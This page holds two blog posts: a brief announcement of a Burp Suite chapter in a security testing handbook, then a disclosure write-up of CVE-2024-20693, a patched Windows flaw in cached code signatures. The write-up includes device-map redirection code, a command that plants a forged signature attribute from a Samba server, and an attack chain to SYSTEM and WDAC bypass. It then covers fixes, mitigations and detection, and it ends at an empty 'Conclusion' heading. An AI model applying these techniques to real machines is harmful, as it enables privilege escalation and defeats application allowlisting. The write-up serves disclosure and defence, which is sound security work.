Announcing the Burp Suite Professional chapter in the Testing Handbook

By Maciej Domanski

Based on our security auditing experience, we’ve found that Burp Suite Professional’s dynamic analysis can uncover vulnerabilities hidden amidst the maze of various target components. Unpredictable security issues like race conditions are often elusive when examining source code alone.

While Burp is a comprehensive tool for web application security testing, its extensive feature set can present a steep learning curve. That's where we, Trail of Bits, come in with our new Burp Suite guide in the Testing Handbook. This chapter aims to cut through this complexity, providing a clear and concise roadmap for running Burp Suite and achieving quick, tangible results.

The new chapter starts with an essential discussion on where Burp can support you. This section provides in-depth insights into how Burp can enhance your ability to conduct security testing, especially in the face of challenges like obfuscated front-end code, intricate infrastructural components, variations in deployment environments, or client-side data handling issues.

The chapter provides a step-by-step guide to setting up Burp for your specific application quickly and effectively. It guides you through minimizing setup errors and ensuring potential vulnerabilities are not overlooked, which can make a real difference in your security auditing outcomes. We also explore using key Burp extensions to supercharge your application testing processes and discover more vulnerabilities.

Our Burp chapter concludes with numerous professional tips and tricks to help you apply advanced techniques and reveal lesser-known Burp features that can transform your security testing routine.

Real-world knowledge, real-world results

The Testing Handbook series encapsulates our extensive real-world knowledge and experience. Our insights go beyond mere documentation recitations, offering tried-and-tested strategies from the Trail of Bits team’s security auditing experience.

With this new chapter, we hope to impart the knowledge and confidence you need to dive into Burp Suite and truly harness its potential to secure your web applications.

Ready to supercharge your security testing with Burp Suite? Dive into the chapter now.

CVE-2024-20693: Windows cached code signature manipulation

In the Patch Tuesday update of April 2024, Microsoft released a fix for CVE-2024-20693, a vulnerability we reported. This vulnerability allowed manipulating the cached signing level of an executable or DLL. In this post, we'll describe how we found this issue and what the impact could be on Windows 11.

Background

Last year, we started a project to improve our knowledge of Windows internals, specifically around local vulnerabilities such as privilege escalation. The best way to get started on a new target is to look at recent publications from other researchers: these give the most up-to-date overview of the security design and allow looking for variants of a vulnerability, or even bypasses of the implemented fixes.

The most helpful prior work we found was the presentation “The Print Spooler Bug that Wasn’t in the Print Spooler” at OffensiveCon 2023 by Maddie Stone and James Forshaw from Google. This talk describes a Windows privilege escalation exploit discovered in the wild.

Privilege escalation using an impersonated device map and isolation-aware DLLs

In case you haven't watched this presentation, we'll summarize it here: a highly privileged Windows service that handles requests on behalf of lower-privileged processes can impersonate the requesting process, so that all operations performed by the highly privileged service happen with the permissions and privileges of the lower-privileged process. This is a great security measure, as it means the highly privileged service can never accidentally do something the lower-privileged process would not be able to do itself.
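In code, that pattern looks roughly like the following sketch for a named-pipe server (hPipe and the file path are placeholders, and real services often use the equivalent RPC impersonation APIs instead):

#include <windows.h>
#include <stdio.h>

// Minimal sketch: handle one request from a named-pipe client under the
// client's identity. hPipe is a connected pipe that has just received a
// request.
void HandleRequest(HANDLE hPipe)
{
    // Adopt the client's security context: its token and, importantly
    // for this story, its device map.
    if (!ImpersonateNamedPipeClient(hPipe)) {
        printf("ImpersonateNamedPipeClient failed: %lu\n", GetLastError());
        return;
    }

    // Everything here is checked against the client's permissions, so
    // the service cannot accidentally exceed what the client could do.
    HANDLE hFile = CreateFileW(L"C:\\data\\request.txt", GENERIC_READ,
                               FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile != INVALID_HANDLE_VALUE)
        CloseHandle(hFile);

    // Drop back to the service's own, privileged context.
    RevertToSelf();
}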

One thing to note is that a (low-privileged) process on Windows can change its device map, which can be used to redirect a drive letter such as C: to a different location (for example a specific subfolder, like C:\fakeroot). This changed device map is one of the aspects included in impersonation. This is quite risky: what if the impersonating service attempts to load a DLL while impersonating another process that has set a different device map? That issue was already reported in 2015 by James Forshaw and fixed.
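To make this concrete, here is a minimal sketch of how a process can redirect its own C: drive, assuming the undocumented ntdll primitives described in public Windows internals research (the constants and prototypes below are not in the official SDK headers, and C:\fakeroot is a placeholder):

#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")

// Undocumented values, taken from public Windows internals references.
#define ProcessDeviceMap ((PROCESSINFOCLASS)23)
#define DIRECTORY_ALL_ACCESS 0x000F000FL
#define SYMBOLIC_LINK_ALL_ACCESS 0x000F0001L
#ifndef OBJ_CASE_INSENSITIVE
#define OBJ_CASE_INSENSITIVE 0x00000040L
#endif

NTSYSAPI NTSTATUS NTAPI NtCreateDirectoryObject(PHANDLE DirectoryHandle,
    ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI NTSTATUS NTAPI NtCreateSymbolicLinkObject(PHANDLE LinkHandle,
    ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes,
    PUNICODE_STRING LinkTarget);
NTSYSAPI NTSTATUS NTAPI NtSetInformationProcess(HANDLE ProcessHandle,
    PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation,
    ULONG ProcessInformationLength);

int main(void)
{
    HANDLE hDir = NULL, hLink = NULL;
    OBJECT_ATTRIBUTES oa;
    UNICODE_STRING linkName, target;

    // 1. An anonymous object directory that will become this process's
    //    private DOS device (\??) directory.
    InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
    if (NtCreateDirectoryObject(&hDir, DIRECTORY_ALL_ACCESS, &oa) != 0)
        return 1;

    // 2. Inside it, define "C:" as a link to a folder we control.
    RtlInitUnicodeString(&linkName, L"C:");
    RtlInitUnicodeString(&target, L"\\??\\C:\\fakeroot");
    InitializeObjectAttributes(&oa, &linkName, OBJ_CASE_INSENSITIVE, hDir, NULL);
    if (NtCreateSymbolicLinkObject(&hLink, SYMBOLIC_LINK_ALL_ACCESS, &oa,
                                   &target) != 0)
        return 1;

    // 3. Install the directory as this process's device map.
    if (NtSetInformationProcess(GetCurrentProcess(), ProcessDeviceMap,
                                &hDir, sizeof(hDir)) != 0)
        return 1;

    // From here on, paths under C:\ opened by this process (or by a
    // service impersonating it) resolve under C:\fakeroot instead.
    printf("device map redirected\n");
    return 0;
}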

However, the logic for determining which file to load for LoadLibrary can be quite complicated if it involves side-by-side assemblies (WinSxS). On Windows, it's possible to install multiple different versions of a DLL, and manifest files can be used to specify which version to load for a specific application. DLL files can also include an embedded manifest to specify which versions of their versioned dependencies to load. These are called "isolation aware" DLLs.

The core of the exploited vulnerability is the fact that when an isolation aware DLL file is loaded, the impersonated device map would be used to find the manifests of its dependencies. By combining this with a path traversal in the manifest file, it was possible to make a privileged service load a DLL from a folder on disk specified by the lower-privileged process. Loading this malicious DLL would then lead to privilege escalation (impersonation by design no longer provides any security once malicious code is loaded, because that code can revert the impersonation). For this attack to work, the impersonating service must load an isolation aware DLL that depends on at least one other DLL.

The fix applied by Microsoft to address the issue covered in the Maddie Stone and James Forshaw presentation was a new mitigation that disables the loading of WinSxS manifests using the impersonated device map, but only for processes that have specifically opted in. This flag was only set for a few services that were known to be vulnerable, leaving a lot of privileged services that could be examined for the same issue. Very helpfully, Maddie and James explained how to configure Process Monitor on Windows to find these issues:

Screenshot from the presentation showing how to set up a Process Monitor filter.

So, we set to work finding issues like this. We made a list of isolation aware DLLs with at least one dependency on another library, set up the Process Monitor filters as described and wrote a simple PowerShell script (using the NtObjectManager PowerShell module, also from James Forshaw) to enumerate all RPC services and attempt to call all methods. Then, we cross-referenced the libraries loaded under impersonation with the list of DLLs using a manifest.

We found a single match: wscsvc.dll!

wscsvc.dll

Calling RPC endpoint number 12 on this service (a method that takes no arguments) indirectly loads gpedit.dll. This is an isolation aware DLL, which depends on (among others) comctl32.dll. We replicated the setup from the in-the-wild exploit: we created a new directory at C:\fakeroot, added the required manifest and DLL files, redirected C: to C:\fakeroot and then sent this COM message.

And it works… almost. Process Monitor shows that it opens and reads our fake DLL file, but never gets to “Load Image”, which is the step where the actual code execution starts. Somehow, it was resolving our DLL but refusing to execute its code.

Then we found out that the process associated with the wscsvc.dll service, namely the "Windows Security Center Service", is categorized as a PPL (Protected Process Light). This places restrictions on the code signatures of the DLL files it loads.

Protected Process (Light)

Windows recognizes a number of different protection levels to protect processes from being "modified" (terminated, having their memory altered, getting new threads injected) by a process at a lower protection level. This is used, for example, to make it harder to disable AV tools or important Windows services.

As of Windows 11, the protection levels are:

Level Value
App 8
WinSystem 7
WinTcb 6
Windows 5
Lsa 4
Antimalware 3
CodeGen 2
Authenticode 1
None 0

Whether an operation is allowed is determined by a table known as RtlProtectedAccess. We have summarized it as follows:

(Access matrix not reproduced: rows list the requesting level and columns the target level, covering Authenticode, CodeGen, Antimalware, Lsa, Windows, WinTcb, WinSystem and App.)

It can roughly be summarized as follows: Windows, WinTcb and WinSystem form a hierarchy (Windows < WinTcb < WinSystem). Authenticode, CodeGen, Antimalware and Lsa are separate groups that only allow access from processes in the same group or the Win-* hierarchy. We are not sure how "App" is used; it is new in Windows 10 and has not been documented very well.

In addition, there is the difference between a Protected Process (PP) and a Protected Process Light (PPL): a Protected Process can modify a Protected Process Light (based on the table above), but not the other way around. Some examples: third-party security tools run as Antimalware PPLs, while critical Windows services (like DRM handling) run as Windows or WinTcb PPs. Keep in mind that these protection levels apply in addition to all other authorization checks (such as integrity levels) in Windows. For more information about protected processes, see https://itm4n.github.io/lsass-runasppl/.
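For reference, a process's protection level can be queried from usermode with the documented GetProcessInformation API (available in recent Windows 10 and 11 SDKs); a small sketch, with the target PID supplied on the command line:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    // Hypothetical target: pass a PID, or default to ourselves.
    DWORD pid = (argc > 1) ? (DWORD)atoi(argv[1]) : GetCurrentProcessId();

    HANDLE h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
    if (!h) {
        printf("OpenProcess failed: %lu\n", GetLastError());
        return 1;
    }

    PROCESS_PROTECTION_LEVEL_INFORMATION info = {0};
    if (GetProcessInformation(h, ProcessProtectionLevelInfo,
                              &info, sizeof(info))) {
        // Values include PROTECTION_LEVEL_WINTCB_LIGHT,
        // PROTECTION_LEVEL_ANTIMALWARE_LIGHT and PROTECTION_LEVEL_NONE;
        // see processthreadsapi.h.
        printf("PID %lu protection level: 0x%08lx\n", pid,
               info.ProtectionLevel);
    } else {
        printf("GetProcessInformation failed: %lu\n", GetLastError());
    }
    CloseHandle(h);
    return 0;
}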

Note that this is not considered a defended security boundary by Microsoft: a process running as Administrator can load an exploitable kernel driver, which can be used to modify all protected processes. As admin-to-kernel is not a security boundary according to Microsoft, protected processes also cannot be a security boundary against Administrators.

Aside from the restrictions on being manipulated by other processes, protected processes are also limited in what DLLs they may load. For example, anti-malware services may only load DLLs signed with the same codesigning certificate or by Microsoft itself. From Protecting anti-malware services:

DLL signing requirements

[A]ny non-Windows DLLs that get loaded into the protected service must be signed with the same certificate that was used to sign the anti-malware service.

For protected processes in general, a DLL may only be loaded if it is signed at a specific signature level. Signature levels are assigned to a DLL based on the certificate used for the code signature and its issuer. The exact rules for which signature levels a given PP(L) level may load are quite complicated (and can even be customized with a secure boot policy), and we'll not go into them here. But to summarize: only certain Windows-signed DLLs were allowed to be loaded into our target service.

At this point we had two options: find a different service with the same WinSxS under impersonation vulnerability, or try to bypass the signing of Windows DLL files. The most likely to yield results would of course have been to look for a different service, but the goal of the project was to understand Windows internals better, so we decided to spend a little bit of time on understanding how DLL files are signed.

Sector 7 deciding what to research.

DLL signatures

The codesigning process for PE files is known as Authenticode. Just like TLS, it is based on X.509 certificates. An Authenticode signature is generated by computing the hash of the PE file (leaving out certain fields that will change after signing, such as the checksum and the section for the signature itself), then signing that hash and appending it to the file with the certificate chain (and optionally a timestamp).
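For comparison, this is roughly how usermode code asks Windows to verify an Authenticode signature the slow way, via the documented WinVerifyTrust API (the file path is an arbitrary example):

#include <windows.h>
#include <wintrust.h>
#include <softpub.h>
#include <stdio.h>
#pragma comment(lib, "wintrust.lib")

int main(void)
{
    WINTRUST_FILE_INFO fileInfo = { sizeof(fileInfo) };
    fileInfo.pcwszFilePath = L"C:\\Windows\\System32\\ntdll.dll";

    GUID policy = WINTRUST_ACTION_GENERIC_VERIFY_V2;
    WINTRUST_DATA wtd = { sizeof(wtd) };
    wtd.dwUIChoice = WTD_UI_NONE;              // no signing UI
    wtd.fdwRevocationChecks = WTD_REVOKE_NONE; // skip revocation for brevity
    wtd.dwUnionChoice = WTD_CHOICE_FILE;
    wtd.pFile = &fileInfo;
    wtd.dwStateAction = WTD_STATEACTION_VERIFY;

    // Verifies the embedded (or catalog-backed) Authenticode signature.
    LONG status = WinVerifyTrust(NULL, &policy, &wtd);
    printf("WinVerifyTrust: 0x%08lx (%s)\n", status,
           status == ERROR_SUCCESS ? "valid" : "not valid/unsigned");

    // Release the verification state.
    wtd.dwStateAction = WTD_STATEACTION_CLOSE;
    WinVerifyTrust(NULL, &policy, &wtd);
    return 0;
}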

Because signature verification can be slow and DLLs are loaded often on Windows, a caching mechanism has been implemented for code signatures. For a signed DLL or EXE file, the result of the certificate verification can be stored in an NTFS Extended Attribute (EA) named $KERNEL.PURGE.ESBCACHE. The $KERNEL part of this name means that only the Windows kernel is allowed to set or change this EA. The PURGE part means that the EA will be automatically removed when the contents of the file are modified. Together, these mean it should not be possible to set this EA from usermode or to modify the file without removing the EA. This only works on journaled NTFS partitions, as the PURGE functionality depends on the journal. Note that nothing in this EA binds it to a specific file: the attributes contain the journal ID, but nothing like a file path or inode number.
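The cached result can be inspected (though not set) from usermode via the documented GetCachedSigningLevel API; a quick sketch:

#include <windows.h>
#include <stdio.h>

int main(void)
{
    HANDLE h = CreateFileW(L"C:\\Windows\\System32\\ntdll.dll", GENERIC_READ,
                           FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE)
        return 1;

    ULONG flags = 0, level = 0, thumbAlg = 0, thumbSize = 64;
    UCHAR thumbprint[64];
    if (GetCachedSigningLevel(h, &flags, &level, thumbprint, &thumbSize,
                              &thumbAlg)) {
        // This level is what $KERNEL.PURGE.ESBCACHE caches; for example,
        // SE_SIGNING_LEVEL_WINDOWS is 12.
        printf("cached signing level: %lu (flags 0x%lx)\n", level, flags);
    } else {
        // No cache EA present (or not supported on this volume).
        printf("no cached signing level: error %lu\n", GetLastError());
    }
    CloseHandle(h);
    return 0;
}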

In 2017, James Forshaw reported that it was possible to race the application of this EA: by making the file refer to a catalog, it was possible to slow down the verification enough to modify the contents of the file between the verification of the signature and the application of the EA. As this had been found and fixed a while ago, it was unlikely to still work.

We experimented with placing the file on an SMB share instead and attempting to rewrite the contents between the verification and the image loading, but this wasn't working either (the file was only being read once). But looking at our Wireshark capture and the decompiled code in CI.DLL that parses the $KERNEL.PURGE.ESBCACHE extended attribute, we noticed something that stood out:

Screenshot from Wireshark showing an ioctl request with ID 0x90390.

A $KERNEL.PURGE.ESBCACHE extended attribute should only be trusted on the local volume, as a filesystem on (for example) a USB drive or mounted disk image could have been manipulated by the user. The code contained a check, in the function CipGetVolumeFlags, that we assumed was meant to enforce this and only allow the local boot disk.

__int64 __fastcall CipGetVolumeFlags(__int64 file, int *attributeInformation, _BYTE *containerState)
{
  int *v6; // x20
  BOOL shouldFree; // w21
  int ioctlResponse; // w9
  unsigned int err; // w19
  unsigned int v10; // w19
  __int64 buffer; // x0
  int outputBuffer; // [xsp+0h] [xbp-40h] BYREF
  int returnedOutputBufferLength; // [xsp+4h] [xbp-3Ch] BYREF
  int fsInformation[14]; // [xsp+8h] [xbp-38h] BYREF

  outputBuffer = 0;
  returnedOutputBufferLength = 0;
  memset(fsInformation, 0, 48);
  v6 = fsInformation;
  shouldFree = 0;
  // containerState will be set based on the response to the ioctl with ID 0x90390LL on the file
  if ( (int)FsRtlKernelFsControlFile(file, 0x90390LL, 0LL, 0LL, &outputBuffer, 4LL, &returnedOutputBufferLength) >= 0 )
    ioctlResponse = outputBuffer;
  else
    ioctlResponse = 0;
  outputBuffer = ioctlResponse;
  *containerState = ioctlResponse & 1;
  // attributeInformation will be set based on the IoQueryVolumeInformation for FileFsAttributeInformation (5)
  err = IoQueryVolumeInformation(file, 5LL, 48LL, fsInformation, &returnedOutputBufferLength);
  if ( err == 0x80000005 )
  {
    // Retry in case the buffer is too small
    v10 = fsInformation[2] + 8;
    buffer = ExAllocatePool2(258LL, (unsigned int)(fsInformation[2] + 8), 'csIC');
    v6 = (int *)buffer;
    if ( !buffer )
      return 0xC000009A;
    shouldFree = 1;
    err = IoQueryVolumeInformation(file, 5LL, v10, buffer, &returnedOutputBufferLength);
  }
  if ( (err & 0x80000000) == 0 )
    *attributeInformation = *v6;
  if ( shouldFree )
    ExFreePoolWithTag(v6, 'csIC');
  return err;
}

This was being called from CipGetFileCache:

__int64 __fastcall CipGetFileCache(
        __int64 fileObject,
        unsigned __int8 a2,
        int a3,
        unsigned int *a4,
        _DWORD *a5,
        unsigned __int8 *a6,
        int *a7,
        __int64 a8,
        _DWORD *a9,
        _DWORD *a10,
        __int64 a11,
        __int64 a12,
        _QWORD *a13,
        __int64 *a14)
{
  __int64 eaBuffer_1; // x20
  unsigned __int64 v17; // x22
  unsigned int fileAttributes; // w25
  unsigned int attributeInformation_FileSystemAttributes; // w19
  unsigned int err; // w19
  unsigned int err_1; // w0
  __int64 v22; // x4
  __int64 v23; // x3
  __int64 v24; // x2
  __int64 v25; // x1
  int containerState_1; // w10
  unsigned int v28; // w8
  __int64 eaBuffer; // x0
  _DWORD *v30; // x23
  unsigned __int8 *v31; // x24
  int v32; // w8
  char v33; // w22
  const char *v34; // x10
  __int16 v35; // w9
  char v36; // w8
  unsigned int v37; // w25
  int v38; // w9
  int IsEnabled; // w0
  unsigned int v40; // w8
  unsigned int ContextForReplay; // w0
  __int64 v42; // x2
  _QWORD *v43; // x11
  int v44; // w10
  __int64 v45; // x9
  unsigned __int8 containerState; // [xsp+10h] [xbp-C0h] BYREF
  char v47[7]; // [xsp+11h] [xbp-BFh] BYREF
  _DWORD *v48; // [xsp+18h] [xbp-B8h]
  unsigned __int8 *v49; // [xsp+20h] [xbp-B0h]
  unsigned __int8 v50; // [xsp+28h] [xbp-A8h]
  unsigned __int64 v51; // [xsp+30h] [xbp-A0h] BYREF
  unsigned int v52; // [xsp+38h] [xbp-98h]
  int attributeInformation; // [xsp+3Ch] [xbp-94h] BYREF
  int v54; // [xsp+40h] [xbp-90h] BYREF
  int lengthReturned_1; // [xsp+44h] [xbp-8Ch] BYREF
  int lengthReturned; // [xsp+48h] [xbp-88h] BYREF
  int v57; // [xsp+4Ch] [xbp-84h]
  __int64 v58; // [xsp+50h] [xbp-80h]
  __int64 v59; // [xsp+58h] [xbp-78h]
  __int64 v60; // [xsp+60h] [xbp-70h]
  _QWORD *v61; // [xsp+68h] [xbp-68h]
  int *v62; // [xsp+70h] [xbp-60h]
  int eaList[8]; // [xsp+78h] [xbp-58h] BYREF
  char fileBasicInformation[40]; // [xsp+98h] [xbp-38h] BYREF

  [...]

  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 )
  {
    containerState_1 = 0;
  }
  else
  {
    lengthReturned_1 = 0;
    memset(fileBasicInformation, 0, sizeof(fileBasicInformation));
    err = IoQueryFileInformation(fileObject, 4LL, 40LL, fileBasicInformation, &lengthReturned_1);
    if ( (err & 0x80000000) != 0 )
    {
      [...]
      goto LABEL_8;
    }
    fileAttributes = *(_DWORD *)&fileBasicInformation[32];
    // Calling the function above
    err_1 = CipGetVolumeFlags(fileObject, &attributeInformation, &containerState);
    v17 = v51;
    err = err_1;
    if ( (err_1 & 0x80000000) != 0 )
    {
      *a4 = 27;
LABEL_7:
      v22 = *a4;
      goto LABEL_8;
    }
    attributeInformation_FileSystemAttributes = attributeInformation;
    containerState_1 = containerState;
  }
  // If the out variable containerState was non-zero, all of the checks don't matter and we go to LABEL_19 to read the EA.
  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 || containerState_1 )
    goto LABEL_19;
  if ( (g_CiOptions & 0x100) == 0 )
  {
    if ( (attributeInformation_FileSystemAttributes & 0x20000) == 0 || (fileAttributes & 0x4000) == 0 )
    {
      *a4 = 5;
      v17 = fileAttributes | ((unsigned __int64)attributeInformation_FileSystemAttributes << 32);
      err = 0xC00000BB;
      goto LABEL_7;
    }
    goto LABEL_23;
  }
  if ( (attributeInformation_FileSystemAttributes & 0x20000) != 0 && (fileAttributes & 0x4000) != 0 )
  {
	
	[...]

  }
LABEL_19:
  eaBuffer = ExAllocateFromPagedLookasideList(&g_CiEaCacheLookasideList);
  eaBuffer_1 = eaBuffer;
  if ( !eaBuffer )
  {
    v28 = 28;
    err = 0xC0000017;
    goto LABEL_12;
  }
  v33 = v50;
  eaList[0] = 0;
  LOBYTE(eaList[1]) = 22;
  if ( v50 )
  {
    v34 = "$Kernel.Purge.CIpCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.CIpCache";
  }
  else
  {
    v34 = "$Kernel.Purge.ESBCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.ESBCache";
  }
  v35 = *((_WORD *)v34 + 10);
  *(int *)((char *)&eaList[5] + 1) = *((_DWORD *)v34 + 4);
  v36 = v34[22];
  *(_WORD *)((char *)&eaList[6] + 1) = v35;
  HIBYTE(eaList[6]) = v36;
  err = FsRtlQueryKernelEaFile(fileObject, eaBuffer, 380LL, 0LL, eaList, 32LL, 0LL, 1LL, &lengthReturned);
  if ( (err & 0x80000000) != 0 )
  {
    *a4 = 2;
LABEL_34:
    v30 = v48;
    v31 = v49;
LABEL_35:
    ExFreeToPagedLookasideList(&g_CiEaCacheLookasideList, eaBuffer_1);
    v17 = v51;
    goto LABEL_36;
  }
  err = CipParseFileCache(eaBuffer_1, v33, (int *)a4, &v51, eaBuffer_1 + 488);
  if ( (err & 0x80000000) != 0 )
    goto LABEL_34;
  v37 = v57;
  err = CipVerifyFileCache((__int64 *)(eaBuffer_1 + 488), eaBuffer_1, fileObject, v57, v58, &v54, (int *)a4, &v51);
  
  [...]

  return err;
}

What we assumed to be an ioctl handled by the SMB driver (using code 0x90390, which isn't documented officially, but may refer to FSCTL_QUERY_VOLUME_CONTAINER_STATE, based on Microsoft's Rust headers) turned out to be an ioctl that gets forwarded over SMB to the server. (While we called them NTFS Extended Attributes, extended attributes in fact work over SMB too.)

If that ioctl results in a value with the lowest bit set, containerState/containerState_1 in CipGetFileCache become non-zero and the code jumps to LABEL_19 above (skipping a lot of checks on the file type, the device type and a g_CiOptions global we don't fully understand either).

In other words: the $KERNEL.PURGE.ESBCACHE extended attribute on a file on an SMB share is trusted if the SMB server itself responds to this ioctl saying it should be trusted! This is of course a problem, as by default non-admin users can mount new network shares.
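A client can observe the server's answer directly; here is a rough sketch using the raw control code from the decompiled check (the UNC path is a placeholder, and 0x90390 is passed as-is since the SDK may not name it):

#include <windows.h>
#include <stdio.h>

int main(void)
{
    HANDLE h = CreateFileW(L"\\\\sambaserver\\mount\\test.dll", GENERIC_READ,
                           FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE)
        return 1;

    DWORD state = 0, returned = 0;
    // 0x90390 is believed to be FSCTL_QUERY_VOLUME_CONTAINER_STATE; over
    // SMB it is forwarded to the server, which picks the answer.
    if (DeviceIoControl(h, 0x90390, NULL, 0, &state, sizeof(state),
                        &returned, NULL)) {
        // If the lowest bit is set, CI.DLL will trust
        // $KERNEL.PURGE.ESBCACHE EAs on this volume.
        printf("container state: 0x%lx\n", state);
    } else {
        printf("ioctl failed: %lu\n", GetLastError());
    }
    CloseHandle(h);
    return 0;
}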

We started out with Samba, patching it to always respond 0x00000001 to this ioctl (Samba does not currently implement it), and implemented two more ioctls: 0x900f4 (FSCTL_QUERY_USN_JOURNAL) for reading the journaling information and 0x900ef (FSCTL_WRITE_USN_CLOSE_RECORD) for flushing the journal. We configured Samba to use ext3 extended attributes to store the EAs used for SMB.

And it worked! From our Linux server running Samba, we could apply any $KERNEL.PURGE.ESBCACHE attribute to a file and Windows would trust it. On Linux, the extended attributes used by Samba can be set using setfattr. 1

setfattr -n 'user.$KERNEL.PURGE.ESBCACHE' -v '0skwAAAAMAAg4AAAAAAAAAAIC1e18kqdkBQgAAAHUAJwEMgAAAIGliE1R8dXRmTogdh511MDKXHu0gQC2E1gewfvL5KmZ+JwAMgAAAIGOIg7QdUUiX461yis071EIc4IyH1TDa1WkxRY/PW8thJwQMgAAAIDSDabKZZ2jBOK8AdcS2gu8F0miSEm+H/RilbYQrLrbj' "$1"

We could now create fake EAs that could specify any code signing level we wanted. How can we abuse this?

Combining the DLL load and signature bypass

Now we got to the next challenge: how do we combine these two vulnerabilities? We could make wscsvc.dll load our own DLL using path traversal, but a path traversal from C: cannot reach into an SMB share. A symbolic link could work, but by default non-admin users on Windows are not allowed to create these. Directory junctions and other symlink-like constructs that Windows supports cannot point to SMB shares.

We could perform the attack if the user plugged in an NTFS-formatted USB device containing a symlink to the SMB share. The user could then create a directory junction from the new C: mountpoint in their device map to the USB disk.

C:\fakeroot --(directory junction)--> E:\ --(symlink)--> \\sambaserver\mount

But this required physical access to the machine. We preferred something that would also work remotely.

So we needed a third vulnerability: creating a symlink as a non-admin user.

We tried various things, like mounting disk images or unpacking zip files with symlinks, but before we found a way to do this, Microsoft rolled out a more extensive fix for the WinSxS manifest loading under impersonated device maps in August 2023 (as CVE-2023-35359): instead of being opt-in for processes, the device map is now always ignored when reading the manifest.

This meant that our DLL loading vulnerability in wscsvc.dll was no longer working, but we still had the signature bypass. So, next question: what can we do with just cached signature level manipulation on Windows?

Applying the signature bypass

Privilege escalation to SYSTEM using .theme files

In the previous post, "Getting SYSTEM on Windows in style", we showed how we managed to elevate privileges on Windows by racing a signature check for a DLL included from a Windows .theme file. In that post we used a race condition, but we originally found the issue by setting a manipulated $KERNEL.PURGE.ESBCACHE attribute on the *.msstyles_vrf.dll file. This worked in essentially the same way: we set a new theme which refers to a specifically crafted .msstyles file. Next to the .msstyles file, we place a .msstyles_vrf.dll file. When the user logs in (or sets DPI scaling to >100%), WinLogon.exe (which runs as SYSTEM) will check the signature level of this DLL file, and if it is signed at least at level 6 ("Store"), it will load it, elevating our privileges.

As Microsoft completely removed the loading of *.msstyles_vrf.dll files from themes for CVE-2023-38146, this issue was also fixed.

Bypassing WDAC

One place where cached signatures were used for executables is Windows Defender Application Control (WDAC), an allowlisting technology for executables on Windows. This functionality can be used (typically in a corporate environment) to limit which applications a user is allowed to run and which DLLs may be loaded. Binaries can be allowlisted based on file path or file hash, but also on the identity of the code signer. WDAC policies can be very powerful and granular, so each company using it probably has its own policy, but the default templates allow all software signed by Microsoft itself to run.

Assuming the WDAC policy allows all software signed by Microsoft, we can add an EA indicating Microsoft as the signer to any executable and run it.

Injecting code into protected processes

The signature bypass can also be used by administrators to inject code into a protected process (regardless of the level), for example by replacing a DLL from system32 with a symlink to an SMB share and then launching a service that runs as a protected process.

Keep in mind that this is not considered a security boundary by Microsoft, which also means that known techniques that abuse this do not get fixed. So for our demonstration we combined it with the approach used by ANGRYORCHARD to mark our thread as a kernel mode thread and then map the device’s physical memory into our process.

Combining all steps

  1. We use the modified EA on a .msstyles_vrf.dll file to bypass the signature verification in Winlogon.exe to elevate privileges to SYSTEM.
  2. We replace a DLL file from system32 with a symlink to a file with a manipulated cached signature on the SMB share. Then, we launch a protected process running at level WinTcb (we chose services.exe). 
  3. We use our code running in services.exe to inject code into CSRSS.exe and apply the technique from ANGRYORCHARD to gain physical memory r/w.

Combined with the Mark-of-the-Web bypass found by gabe_k for .themepack files, this attack could have been triggered with just the user opening a downloaded file. Depending on the WDAC policy, we could also have bypassed that.

Fix

So, how did Microsoft fix this?

We had hoped they would disable the reading of $KERNEL.* extended attributes from SMB completely. However, that was not the approach that was taken. Instead, the instances we exploited were fixed:

  1. The fix for CVE-2023-38146 already disabled the loading for *.msstyles_vrf.dll files completely, fixing the privilege escalation.
  2. When WDAC is enabled, the function to retrieve the cached signature level of a file now always returns an error (even for local files!).
  3. When loading a DLL into a protected process, the cached signature level is no longer used. (This was fixed despite Microsoft not considering it a defended security boundary.)

Timeline

  • August 25, 2023: Issue reported to MSRC.
  • September 12, 2023: The fix for CVE-2023-38146 was released, breaking our privilege escalation exploit.
  • September 20, 2023: MSRC indicates that they have reproduced the issue and that a fix is scheduled for January 2024.
  • December 11, 2023: MSRC informs us that a regression was found and asks to reschedule the fix to April 2024.
  • April 9, 2024: Fix released for the WDAC and PPL bypass as CVE-2024-20693.
  • April 25, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us.
  • April 26, 2024: Microsoft Bounty Team sends back a boilerplate reply that the case is under review.
  • May 17, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us again.
  • May 22, 2024: Microsoft Bounty Team replies that the vulnerability was out of scope for a bounty, claiming it didn’t reproduce on the right WIP build.

Mitigation

This attack depends on the victim connecting to a malicious SMB server. Therefore, blocking outgoing SMB to the internet would make this attack a lot harder (unless the attacker already has a foothold on the local network). Preventing users from mounting new SMB shares would also work as a mitigation, but could have more unintended consequences.
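On a single Windows host, for example, outbound SMB can be blocked with a built-in firewall rule along these lines (a sketch; enterprise deployments would rather enforce this via group policy or at the network perimeter):

netsh advfirewall firewall add rule name="Block outbound SMB" dir=out action=block protocol=TCP remoteport=445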

Examining SMB traffic for exploitation of this issue should also be possible by looking for responses to the ioctl 0x90390 or responses for the EA $KERNEL.PURGE.ESBCACHE.
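As a starting point, a display filter like the following should surface those ioctl exchanges in a capture, assuming Wireshark's standard smb2 field names:

tshark -r capture.pcapng -Y 'smb2.ioctl.function == 0x00090390'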

Conclusion

